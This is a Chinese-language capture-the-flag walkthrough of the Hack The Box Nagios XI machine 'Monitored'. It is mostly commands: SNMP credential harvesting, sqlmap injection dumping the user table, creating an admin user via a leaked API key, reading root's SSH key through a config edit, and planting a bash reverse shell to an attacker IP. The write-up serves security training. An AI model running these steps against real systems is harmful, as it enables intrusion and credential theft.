Main

$ nmap -p- -sC -sV 10.10.11.248 --min-rate 1000

# echo "10.10.11.248 nagios.monitored.htb" >>/etc/hosts

• Nagios 是一个流行的开源网络监控系统，用于监控计算机系统、网络设备、服务以及应用程序。它可以实时监控主机和服务的状态，及时发现和报告问题，从而帮助管理员快速诊断和解决网络和系统方面的故障。

通过漏洞库查询到存在一个SQL注入
CVE-2023–40933

$ nmap -sU -sC -sV 10.10.11.248 --min-rate 1000

• SNMP（Simple Network Management Protocol）是一种用于管理和监控网络设备的标准协议。它允许网络管理员远程监视网络设备的运行状态、收集性能数据、配置设备以及诊断问题。通过SNMP，管理员可以从网络设备（如路由器、交换机、服务器等）中获取信息，也可以向这些设备发送控制命令。SNMP使用一个基于文本的数据格式来交换信息，通常被用于监控和管理大型企业网络。

$ snmpwalk -v2c -c public nagios.monitored.htb
从结果中发现了了登录凭据svc XjH7VCehowpR1xZB

• snmpbulkwalk 是一个基于命令行的工具，用于执行 SNMP（Simple Network Management Protocol）的批量查询。它通常用于获取大量的网络设备信息，比如路由器、交换机等。与标准的 snmpwalk 工具相比，snmpbulkwalk 通过在单个请求中获取多个变量来提高效率，减少了网络交互的次数，因此对于大型网络或者需要获取大量信息的情况下更加高效。snmpbulkwalk 工具允许用户指定要查询的设备、OID（Object Identifier）以及相关的认证参数，以便获取所需的网络设备信息

https://nagios.monitored.htb/nagiosxi/includes/components/ccm/index.php

https://nagios.monitored.htb/nagiosxi/admin/banner_message-ajaxhelper.php

页面存在

$ curl -X POST -k -L -d 'username=svc&password=XjH7VCehowpR1xZB' https://nagios.monitored.htb/nagiosxi/api/v1/authenticate/

我们可以通过这个接口来获取TOKEN

$ sqlmap -u "https://nagios.monitored.htb//nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3&token=`curl -ksX POST https://nagios.monitored.htb/nagiosxi/api/v1/authenticate -d "username=svc&password=XjH7VCehowpR1xZB&valid_min=500" | awk -F'"' '{print$12}'`" --level 5 --risk 3 -p id --batch --dbs

$ sqlmap -u "https://nagios.monitored.htb//nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3&token=`curl -ksX POST https://nagios.monitored.htb/nagiosxi/api/v1/authenticate -d "username=svc&password=XjH7VCehowpR1xZB&valid_min=500" | awk -F'"' '{print$12}'`" --level 5 --risk 3 -p id --batch -D nagiosxi --tables

$ sqlmap -u "https://nagios.monitored.htb//nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3&token=`curl -ksX POST https://nagios.monitored.htb/nagiosxi/api/v1/authenticate -d "username=svc&password=XjH7VCehowpR1xZB&valid_min=500" | awk -F'"' '{print$12}'`" --level 5 --risk 3 -p id --batch -D nagiosxi -T xi_users --dump

我们将通过这个APIKEY来添加一个用户

$ curl -XPOST 'https://nagios.monitored.htb/nagiosxi/api/v1/system/user?apikey=IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL&pretty=1' -d 'username=s-h4ck13&password=maptnh&[email protected]&name=mapth&auth_level=admin' -k

登录后台https://nagios.monitored.htb/nagiosxi/login.php
如果是真实环境在这里其实可在SQL数据库中修改管理员的邮箱,让后忘记密码,这样发送的重置密码就会到攻击者邮箱验证修改
username:s-h4ck13
password:maptnh

Configure->Core Config Manager->Commands->Add New

选择命令后,点击右下角Run Check Command

User Flag

/home/nagios$ cat user.txt

39ea0ded58be8ba1cf84a3f332e5757e

Root Flag

$ sudo -l

方法1

$ cat /usr/local/nagiosxi/scripts/components/getprofile.sh

我们将内容复制下来分析

在277行发现一个文件我们有权限进行修改

$ cat /usr/local/nagios/etc/nagios.cfg

$ vi /usr/local/nagios/etc/nagios.cfg
把log_file=/usr/local/nagios/var/nagios.log修改成log_file=/root/.ssh/id_rsa

$ sudo /usr/local/nagiosxi/scripts/components/getprofile.sh 1

[靶机]

$ cd /usr/local/nagiosxi/var/components
$ /usr/local/nagiosxi/var/components$ python -m http.server 7890

[Kali]

$ wget http://10.10.11.248:7890/profile.zip
$ unzip profile.zip
目录profile-1714316974/nagios-logs/nagios.txt已经读取到root用户的私钥

$ cd profile-1714316974/nagios-logs;mv nagios.txt id_rsa;chmod 400 id_rsa;ssh -i id_rsa [email protected]

4c45fe55bd0f2f1364c07760c92af9d8

方法2

[靶机]

$ ls /usr/local/nagiosxi/scripts/ -la

$ cd /usr/local/nagiosxi/scripts/

$ cat manage_services.sh

用于操作服务的

我们可以控制启动npcd服务来反弹一个shell

• npcd 是 Nagios XI 中的一个守护进程（daemon），用于执行网络设备的自动发现和监控。Nagios 是一个流行的开源网络监控工具，Nagios XI 是 Nagios 的商业版本，提供了更多功能和易用性。

$ systemctl status npcd

找到服务位置

$ sudo ./manage_services.sh stop npcd

$ systemctl status npcd

$ rm /usr/local/nagios/bin/npcd

我们可以手动删除这个npcd,

我们可以看之前的权限,我们所在组是具有高权限的,可以进行删除该文件

$ vi /usr/local/nagios/bin/npcd
劫持该服务

#!/bin/bash
 bash -i >& /dev/tcp/10.10.16.23/10034 0>&1

$ chmod +x /usr/local/nagios/bin/npcd

方法2-1

$ sudo ./manage_services.sh start npcd

4c45fe55bd0f2f1364c07760c92af9d8

方法2-2

值得庆幸的是在/usr/local/nagiosxi/scripts/components/getprofile.sh调用了这个可执行文件

$ sudo /usr/local/nagiosxi/scripts/components/getprofile.sh 1

4c45fe55bd0f2f1364c07760c92af9d8

4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途，否则一切后果请用户自负。

本站信息来自网络，版权争议与本站无关。您必须在下载后的24个小时之内，从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序，请支持正版，购买注册，得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解！

程序来源网络，不确保不包含木马病毒等危险内容，请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱：4ablog168#gmail.com（#换成@）